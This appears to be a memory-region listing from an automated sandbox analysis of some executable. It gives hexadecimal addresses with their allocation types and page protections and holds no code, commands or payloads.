page read and write
|
||
|
1D04000
|
heap
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
5646000
|
heap
|
page read and write
|
||
|
4033000
|
heap
|
page read and write
|
||
|
44B3000
|
heap
|
page read and write
|
||
|
1D00000
|
heap
|
page read and write
|
||
|
4053000
|
heap
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page read and write
|
||
|
418C000
|
heap
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
173000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
29EB000
|
trusted library allocation
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
1DE0000
|
heap
|
page read and write
|
||
|
4500000
|
heap
|
page read and write
|
||
|
3195000
|
trusted library allocation
|
page read and write
|
||
|
344D000
|
heap
|
page read and write
|
||
|
43D9000
|
heap
|
page read and write
|
||
|
4441000
|
heap
|
page read and write
|
||
|
1D39000
|
heap
|
page read and write
|
||
|
1F70000
|
direct allocation
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
43AB000
|
heap
|
page read and write
|
||
|
47C3000
|
heap
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
526A000
|
heap
|
page read and write
|
||
|
29F4000
|
trusted library allocation
|
page read and write
|
||
|
4357000
|
heap
|
page read and write
|
||
|
4060000
|
heap
|
page read and write
|
||
|
43E2000
|
heap
|
page read and write
|
||
|
435D000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
34F000
|
heap
|
page read and write
|
||
|
141D79000
|
direct allocation
|
page read and write
|
||
|
3B61000
|
heap
|
page read and write
|
||
|
418C000
|
heap
|
page read and write
|
||
|
1DD6000
|
heap
|
page read and write
|
||
|
1B086000
|
heap
|
page read and write
|
||
|
300000
|
trusted library allocation
|
page read and write
|
||
|
385000
|
heap
|
page read and write
|
||
|
3B6A000
|
heap
|
page read and write
|
||
|
4068000
|
heap
|
page read and write
|
||
|
FE000
|
heap
|
page read and write
|
||
|
7FE89680000
|
trusted library allocation
|
page read and write
|
||
|
3449000
|
heap
|
page read and write
|
||
|
7FE89560000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF85000
|
trusted library allocation
|
page execute read
|
||
|
4138000
|
heap
|
page read and write
|
||
|
7FE89630000
|
trusted library allocation
|
page read and write
|
||
|
4777000
|
heap
|
page read and write
|
||
|
458000
|
heap
|
page read and write
|
||
|
29EB000
|
trusted library allocation
|
page read and write
|
||
|
3580000
|
trusted library allocation
|
page read and write
|
||
|
55AD000
|
heap
|
page read and write
|
||
|
4076000
|
heap
|
page read and write
|
||
|
1D10000
|
heap
|
page read and write
|
||
|
280B000
|
heap
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
405A000
|
heap
|
page read and write
|
||
|
5167000
|
heap
|
page read and write
|
||
|
525E000
|
heap
|
page read and write
|
||
|
3A95000
|
trusted library allocation
|
page read and write
|
||
|
2510000
|
heap
|
page read and write
|
||
|
2A65000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF89000
|
trusted library allocation
|
page execute read
|
||
|
439000
|
heap
|
page read and write
|
||
|
276000
|
heap
|
page read and write
|
||
|
3C1000
|
heap
|
page read and write
|
||
|
29E7000
|
trusted library allocation
|
page read and write
|
||
|
4080000
|
heap
|
page read and write
|
||
|
797000
|
heap
|
page read and write
|
||
|
4037000
|
heap
|
page read and write
|
||
|
153000
|
heap
|
page read and write
|
||
|
388000
|
stack
|
page read and write
|
||
|
4181000
|
trusted library allocation
|
page read and write
|
||
|
386F000
|
stack
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
281000
|
heap
|
page read and write
|
||
|
43BF000
|
heap
|
page read and write
|
||
|
43BF000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
1A750000
|
heap
|
page read and write
|
||
|
40D8000
|
heap
|
page read and write
|
||
|
7FE89AD8000
|
trusted library allocation
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
2CB000
|
stack
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
124000
|
heap
|
page read and write
|
||
|
3B78000
|
heap
|
page read and write
|
||
|
1A745000
|
heap
|
page read and write
|
||
|
4319000
|
heap
|
page read and write
|
||
|
1C50C000
|
heap
|
page read and write
|
||
|
43D4000
|
heap
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
3454000
|
heap
|
page read and write
|
||
|
1F10000
|
direct allocation
|
page read and write
|
||
|
C0000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89590000
|
trusted library allocation
|
page read and write
|
||
|
6AE000
|
stack
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
4073000
|
heap
|
page read and write
|
||
|
1C150000
|
heap
|
page read and write
|
||
|
28A000
|
heap
|
page read and write
|
||
|
43C1000
|
heap
|
page read and write
|
||
|
40DE000
|
heap
|
page read and write
|
||
|
43F1000
|
heap
|
page read and write
|
||
|
434F000
|
heap
|
page read and write
|
||
|
109000
|
heap
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
3B6A000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
7FE89A8C000
|
trusted library allocation
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
3190000
|
trusted library allocation
|
page read and write
|
||
|
90000
|
heap
|
page read and write
|
||
|
2A1F000
|
stack
|
page read and write
|
||
|
2C0000
|
trusted library allocation
|
page read and write
|
||
|
4073000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
296000
|
heap
|
page read and write
|
||
|
56B0000
|
heap
|
page read and write
|
||
|
33B6000
|
heap
|
page read and write
|
||
|
43D9000
|
heap
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
14E000
|
heap
|
page read and write
|
||
|
7FE89550000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page read and write
|
||
|
3417000
|
direct allocation
|
page read and write
|
||
|
3520000
|
trusted library allocation
|
page read and write
|
||
|
347F000
|
heap
|
page read and write
|
||
|
142C00000
|
direct allocation
|
page read and write
|
||
|
1C7000
|
heap
|
page read and write
|
||
|
2A8E000
|
trusted library allocation
|
page read and write
|
||
|
41F6000
|
heap
|
page read and write
|
||
|
306000
|
heap
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
4076000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
13F78B000
|
unkown
|
page readonly
|
||
|
42C000
|
heap
|
page read and write
|
||
|
56C8000
|
heap
|
page read and write
|
||
|
1CC000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3B68000
|
heap
|
page read and write
|
||
|
47D1000
|
heap
|
page read and write
|
||
|
1CDD000
|
direct allocation
|
page read and write
|
||
|
5542000
|
heap
|
page read and write
|
||
|
3454000
|
heap
|
page read and write
|
||
|
1C56000
|
heap
|
page read and write
|
||
|
3B60000
|
heap
|
page read and write
|
||
|
1C5AF000
|
stack
|
page read and write
|
||
|
2401000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF83000
|
trusted library allocation
|
page execute read
|
||
|
29E5000
|
trusted library allocation
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
2A69000
|
trusted library allocation
|
page read and write
|
||
|
5B4000
|
heap
|
page read and write
|
||
|
412B000
|
heap
|
page read and write
|
||
|
287000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
2A8A000
|
trusted library allocation
|
page read and write
|
||
|
5247000
|
heap
|
page read and write
|
||
|
4441000
|
heap
|
page read and write
|
||
|
1C440000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
1F3000
|
heap
|
page read and write
|
||
|
4415000
|
heap
|
page read and write
|
||
|
4BE000
|
heap
|
page read and write
|
||
|
1A7E6000
|
heap
|
page read and write
|
||
|
4114000
|
heap
|
page read and write
|
||
|
350E000
|
stack
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
410C000
|
heap
|
page read and write
|
||
|
2A9A000
|
trusted library allocation
|
page read and write
|
||
|
7EA000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
7FE89517000
|
trusted library allocation
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
13FF6B000
|
unkown
|
page readonly
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
4065000
|
heap
|
page read and write
|
||
|
43E7000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
29E7000
|
trusted library allocation
|
page read and write
|
||
|
571A000
|
heap
|
page read and write
|
||
|
1B27F000
|
stack
|
page read and write
|
||
|
F0000
|
direct allocation
|
page read and write
|
||
|
339E000
|
heap
|
page read and write
|
||
|
5703000
|
heap
|
page read and write
|
||
|
22A000
|
heap
|
page read and write
|
||
|
3D5000
|
heap
|
page read and write
|
||
|
140030000
|
unkown
|
page read and write
|
||
|
3B60000
|
heap
|
page read and write
|
||
|
7FE89362000
|
trusted library allocation
|
page read and write
|
||
|
2A9B000
|
trusted library allocation
|
page read and write
|
||
|
16E000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
412B000
|
heap
|
page read and write
|
||
|
320A000
|
trusted library allocation
|
page read and write
|
||
|
CE000
|
heap
|
page read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
|
7FE8992C000
|
trusted library allocation
|
page execute and read and write
|
||
|
43AB000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
2A63000
|
trusted library allocation
|
page read and write
|
||
|
7FE89370000
|
trusted library allocation
|
page read and write
|
||
|
40D7000
|
heap
|
page read and write
|
||
|
1E10000
|
direct allocation
|
page read and write
|
||
|
7FE898DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D60000
|
direct allocation
|
page read and write
|
||
|
4415000
|
heap
|
page read and write
|
||
|
3F7000
|
heap
|
page read and write
|
||
|
7FFFFF84000
|
trusted library allocation
|
page readonly
|
||
|
43E2000
|
heap
|
page read and write
|
||
|
7FE89620000
|
trusted library allocation
|
page read and write
|
||
|
3D7000
|
heap
|
page read and write
|
||
|
4060000
|
heap
|
page read and write
|
||
|
1C362000
|
heap
|
page read and write
|
||
|
5623000
|
heap
|
page read and write
|
||
|
4779000
|
heap
|
page read and write
|
||
|
3585000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF80000
|
trusted library allocation
|
page readonly
|
||
|
43F3000
|
heap
|
page read and write
|
||
|
574A000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A65000
|
trusted library allocation
|
page read and write
|
||
|
D06000
|
heap
|
page read and write
|
||
|
47D1000
|
heap
|
page read and write
|
||
|
441000
|
heap
|
page read and write
|
||
|
1AABF000
|
stack
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
4441000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
435F000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
247D000
|
trusted library allocation
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
1B24F000
|
stack
|
page read and write
|
||
|
2FF6000
|
trusted library allocation
|
page read and write
|
||
|
43C3000
|
heap
|
page read and write
|
||
|
3190000
|
trusted library allocation
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
3BD000
|
heap
|
page read and write
|
||
|
94000
|
heap
|
page read and write
|
||
|
43BF000
|
heap
|
page read and write
|
||
|
3399000
|
heap
|
page read and write
|
||
|
13F5F1000
|
unkown
|
page execute read
|
||
|
429000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
3D1000
|
heap
|
page read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
515B000
|
heap
|
page read and write
|
||
|
56D4000
|
heap
|
page read and write
|
||
|
2E1A000
|
stack
|
page read and write
|
||
|
1C63E000
|
stack
|
page read and write
|
||
|
4114000
|
heap
|
page read and write
|
||
|
4071000
|
heap
|
page read and write
|
||
|
3B61000
|
heap
|
page read and write
|
||
|
1C3C0000
|
heap
|
page read and write
|
||
|
1A69F000
|
stack
|
page read and write
|
||
|
1A6EE000
|
heap
|
page execute and read and write
|
||
|
90000
|
heap
|
page read and write
|
||
|
4353000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
3A8E000
|
heap
|
page read and write
|
||
|
C8000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
40D7000
|
heap
|
page read and write
|
||
|
1B860000
|
heap
|
page read and write
|
||
|
1D40000
|
direct allocation
|
page read and write
|
||
|
2A72000
|
trusted library allocation
|
page read and write
|
||
|
1A74E000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
361000
|
heap
|
page read and write
|
||
|
44FC000
|
heap
|
page read and write
|
||
|
55FF000
|
heap
|
page read and write
|
||
|
7FE89990000
|
trusted library allocation
|
page execute and read and write
|
||
|
3400000
|
trusted library allocation
|
page read and write
|
||
|
13F857000
|
unkown
|
page read and write
|
||
|
1AF20000
|
heap
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
406F000
|
heap
|
page read and write
|
||
|
1C91E000
|
stack
|
page read and write
|
||
|
41F4000
|
heap
|
page read and write
|
||
|
353000
|
heap
|
page read and write
|
||
|
1FE000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
29E3000
|
trusted library allocation
|
page read and write
|
||
|
3CBE000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
29EE000
|
trusted library allocation
|
page read and write
|
||
|
39B000
|
heap
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
142579000
|
direct allocation
|
page read and write
|
||
|
3F9F000
|
stack
|
page read and write
|
||
|
43C9000
|
heap
|
page read and write
|
||
|
7FE89542000
|
trusted library allocation
|
page read and write
|
||
|
F9000
|
heap
|
page read and write
|
||
|
2E88000
|
trusted library allocation
|
page read and write
|
||
|
462000
|
heap
|
page read and write
|
||
|
40A9000
|
trusted library allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
3451000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
123AF000
|
trusted library allocation
|
page read and write
|
||
|
2D1E000
|
stack
|
page read and write
|
||
|
339C000
|
heap
|
page read and write
|
||
|
459000
|
remote allocation
|
page execute and read and write
|
||
|
3D6000
|
heap
|
page read and write
|
||
|
31E000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
3CA000
|
heap
|
page read and write
|
||
|
1C18B000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
43E4000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
1C2E2000
|
heap
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
276000
|
heap
|
page read and write
|
||
|
7FFFFF82000
|
trusted library allocation
|
page readonly
|
||
|
435D000
|
heap
|
page read and write
|
||
|
55E8000
|
heap
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
43C1000
|
heap
|
page read and write
|
||
|
434A000
|
heap
|
page read and write
|
||
|
7FE89568000
|
trusted library allocation
|
page read and write
|
||
|
15A000
|
heap
|
page read and write
|
||
|
3A95000
|
trusted library allocation
|
page read and write
|
||
|
3D4000
|
heap
|
page read and write
|
||
|
7FE895E0000
|
trusted library allocation
|
page read and write
|
||
|
347F000
|
heap
|
page read and write
|
||
|
31F9000
|
trusted library allocation
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
347F000
|
heap
|
page read and write
|
||
|
382000
|
heap
|
page read and write
|
||
|
2ED000
|
stack
|
page read and write
|
||
|
CE8000
|
heap
|
page read and write
|
||
|
4415000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
20CF000
|
stack
|
page read and write
|
||
|
357D000
|
trusted library allocation
|
page read and write
|
||
|
518A000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
1A7AF000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
41F4000
|
heap
|
page read and write
|
||
|
2A9E000
|
trusted library allocation
|
page read and write
|
||
|
1C3BF000
|
stack
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
412B000
|
heap
|
page read and write
|
||
|
7FE89690000
|
trusted library allocation
|
page read and write
|
||
|
43E2000
|
heap
|
page read and write
|
||
|
43E000
|
heap
|
page read and write
|
||
|
41F4000
|
heap
|
page read and write
|
||
|
3B68000
|
heap
|
page read and write
|
||
|
55A1000
|
heap
|
page read and write
|
||
|
3B68000
|
heap
|
page read and write
|
||
|
33F0000
|
direct allocation
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
1D46000
|
heap
|
page read and write
|
||
|
2A91000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2B6000
|
heap
|
page read and write
|
||
|
594000
|
heap
|
page read and write
|
||
|
9401F000
|
direct allocation
|
page read and write
|
||
|
4316000
|
heap
|
page read and write
|
||
|
1CA7000
|
direct allocation
|
page read and write
|
||
|
3B53000
|
heap
|
page read and write
|
||
|
41F4000
|
heap
|
page read and write
|
||
|
74E000
|
stack
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
29EB000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
43E4000
|
heap
|
page read and write
|
||
|
7FE89C4A000
|
trusted library allocation
|
page read and write
|
||
|
1B020000
|
heap
|
page read and write
|
||
|
4485000
|
heap
|
page read and write
|
||
|
1A62C000
|
stack
|
page read and write
|
||
|
1EF0000
|
direct allocation
|
page read and write
|
||
|
2270000
|
heap
|
page execute and read and write
|
||
|
31F0000
|
trusted library allocation
|
page read and write
|
||
|
5537000
|
heap
|
page read and write
|
||
|
30D5000
|
trusted library allocation
|
page read and write
|
||
|
523B000
|
heap
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
3B60000
|
heap
|
page read and write
|
||
|
1A730000
|
heap
|
page read and write
|
||
|
261000
|
heap
|
page read and write
|
||
|
4073000
|
heap
|
page read and write
|
||
|
412E000
|
heap
|
page read and write
|
||
|
1AC40000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
39F000
|
heap
|
page read and write
|
||
|
3400000
|
trusted library allocation
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
4078000
|
heap
|
page read and write
|
||
|
5652000
|
heap
|
page read and write
|
||
|
4116000
|
heap
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
43DF000
|
heap
|
page read and write
|
||
|
3B72000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
368000
|
heap
|
page read and write
|
||
|
197000
|
heap
|
page read and write
|
||
|
4116000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
406E000
|
heap
|
page read and write
|
||
|
3451000
|
heap
|
page read and write
|
||
|
C0000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
1E30000
|
direct allocation
|
page read and write
|
||
|
392C000
|
trusted library allocation
|
page read and write
|
||
|
4082000
|
heap
|
page read and write
|
||
|
277B000
|
stack
|
page read and write
|
||
|
1D5F000
|
heap
|
page read and write
|
||
|
3CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89640000
|
trusted library allocation
|
page read and write
|
||
|
42F000
|
heap
|
page read and write
|
||
|
43C1000
|
heap
|
page read and write
|
||
|
1CA2F000
|
stack
|
page read and write
|
||
|
1CC0000
|
direct allocation
|
page read and write
|
||
|
476000
|
heap
|
page read and write
|
||
|
14003F000
|
unkown
|
page readonly
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
40D5000
|
heap
|
page read and write
|
||
|
1C374000
|
heap
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
3410000
|
direct allocation
|
page read and write
|
||
|
476F000
|
heap
|
page read and write
|
||
|
27A000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
3EF000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
25CF000
|
stack
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
214000
|
heap
|
page read and write
|
||
|
4DF000
|
heap
|
page read and write
|
||
|
434A000
|
heap
|
page read and write
|
||
|
281000
|
heap
|
page read and write
|
||
|
31F7000
|
trusted library allocation
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
13F72B000
|
unkown
|
page read and write
|
||
|
7F1000
|
heap
|
page read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
47D1000
|
heap
|
page read and write
|
||
|
35DD000
|
trusted library allocation
|
page read and write
|
||
|
339000
|
heap
|
page read and write
|
||
|
1CDF000
|
direct allocation
|
page read and write
|
||
|
274000
|
heap
|
page read and write
|
||
|
12594000
|
trusted library allocation
|
page read and write
|
||
|
3B61000
|
heap
|
page read and write
|
||
|
19C000
|
heap
|
page read and write
|
||
|
347F000
|
heap
|
page read and write
|
||
|
4129000
|
heap
|
page read and write
|
||
|
39AC000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2A9A000
|
trusted library allocation
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
1CA3000
|
direct allocation
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
36CF000
|
stack
|
page read and write
|
||
|
2A89000
|
trusted library allocation
|
page read and write
|
||
|
43E5000
|
heap
|
page read and write
|
||
|
1E50000
|
heap
|
page read and write
|
||
|
3C1000
|
heap
|
page read and write
|
||
|
3B6A000
|
heap
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
7FE8998C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
1C48A000
|
heap
|
page read and write
|
||
|
43C6000
|
heap
|
page read and write
|
||
|
13F5F1000
|
unkown
|
page execute read
|
||
|
3B68000
|
heap
|
page read and write
|
||
|
1A73E000
|
heap
|
page read and write
|
||
|
13FDD0000
|
unkown
|
page readonly
|
||
|
4415000
|
heap
|
page read and write
|
||
|
431B000
|
heap
|
page read and write
|
||
|
104000
|
heap
|
page read and write
|
||
|
3478000
|
heap
|
page read and write
|
||
|
54FC000
|
heap
|
page read and write
|
||
|
4078000
|
heap
|
page read and write
|
||
|
7FE89380000
|
trusted library allocation
|
page read and write
|
||
|
3A2F000
|
stack
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
3CD000
|
heap
|
page read and write
|
||
|
3189000
|
trusted library allocation
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
1A8D9000
|
stack
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
346000
|
heap
|
page read and write
|
||
|
5513000
|
heap
|
page read and write
|
||
|
4777000
|
heap
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
1F70000
|
heap
|
page execute and read and write
|
||
|
47D2000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
410C000
|
heap
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
4116000
|
heap
|
page read and write
|
||
|
3A93000
|
heap
|
page read and write
|
||
|
3B72000
|
heap
|
page read and write
|
||
|
5137000
|
heap
|
page read and write
|
||
|
7FE89669000
|
trusted library allocation
|
page read and write
|
||
|
40CF000
|
heap
|
page read and write
|
||
|
1DA0000
|
heap
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
30D7000
|
trusted library allocation
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
3B79000
|
heap
|
page read and write
|
||
|
3590000
|
trusted library allocation
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A88000
|
trusted library allocation
|
page read and write
|
||
|
4343000
|
heap
|
page read and write
|
||
|
1C2FE000
|
heap
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
1ED0000
|
direct allocation
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
279000
|
heap
|
page read and write
|
||
|
2E8000
|
heap
|
page read and write
|
||
|
560B000
|
heap
|
page read and write
|
||
|
1C0CF000
|
stack
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89363000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
38EA000
|
stack
|
page read and write
|
||
|
2E7000
|
stack
|
page read and write
|
||
|
2A94000
|
trusted library allocation
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
1C8E0000
|
heap
|
page read and write
|
||
|
1FAE000
|
stack
|
page read and write
|
||
|
23A1000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
heap
|
page read and write
|
||
|
7FE89446000
|
trusted library allocation
|
page execute and read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
522F000
|
heap
|
page read and write
|
||
|
E0000
|
direct allocation
|
page read and write
|
||
|
3AB0000
|
heap
|
page read and write
|
||
|
140030000
|
unkown
|
page write copy
|
||
|
313E000
|
stack
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
3397000
|
heap
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
1C4DB000
|
heap
|
page read and write
|
||
|
28A000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
1ADD0000
|
heap
|
page read and write
|
||
|
4778000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
4316000
|
heap
|
page read and write
|
||
|
4073000
|
heap
|
page read and write
|
||
|
24D000
|
heap
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
5196000
|
heap
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
1A752000
|
heap
|
page read and write
|
||
|
43E9000
|
heap
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
320F000
|
trusted library allocation
|
page read and write
|
||
|
4360000
|
heap
|
page read and write
|
||
|
1A3A0000
|
heap
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
3400000
|
trusted library allocation
|
page read and write
|
||
|
1C140000
|
heap
|
page read and write
|
||
|
1F2E000
|
stack
|
page read and write
|
||
|
38B000
|
heap
|
page read and write
|
||
|
40E9000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
43DA000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
34A000
|
heap
|
page read and write
|
||
|
5172000
|
heap
|
page read and write
|
||
|
1A7F2000
|
heap
|
page read and write
|
||
|
40CD000
|
heap
|
page read and write
|
||
|
FE000
|
heap
|
page read and write
|
||
|
4108000
|
heap
|
page read and write
|
||
|
48E000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
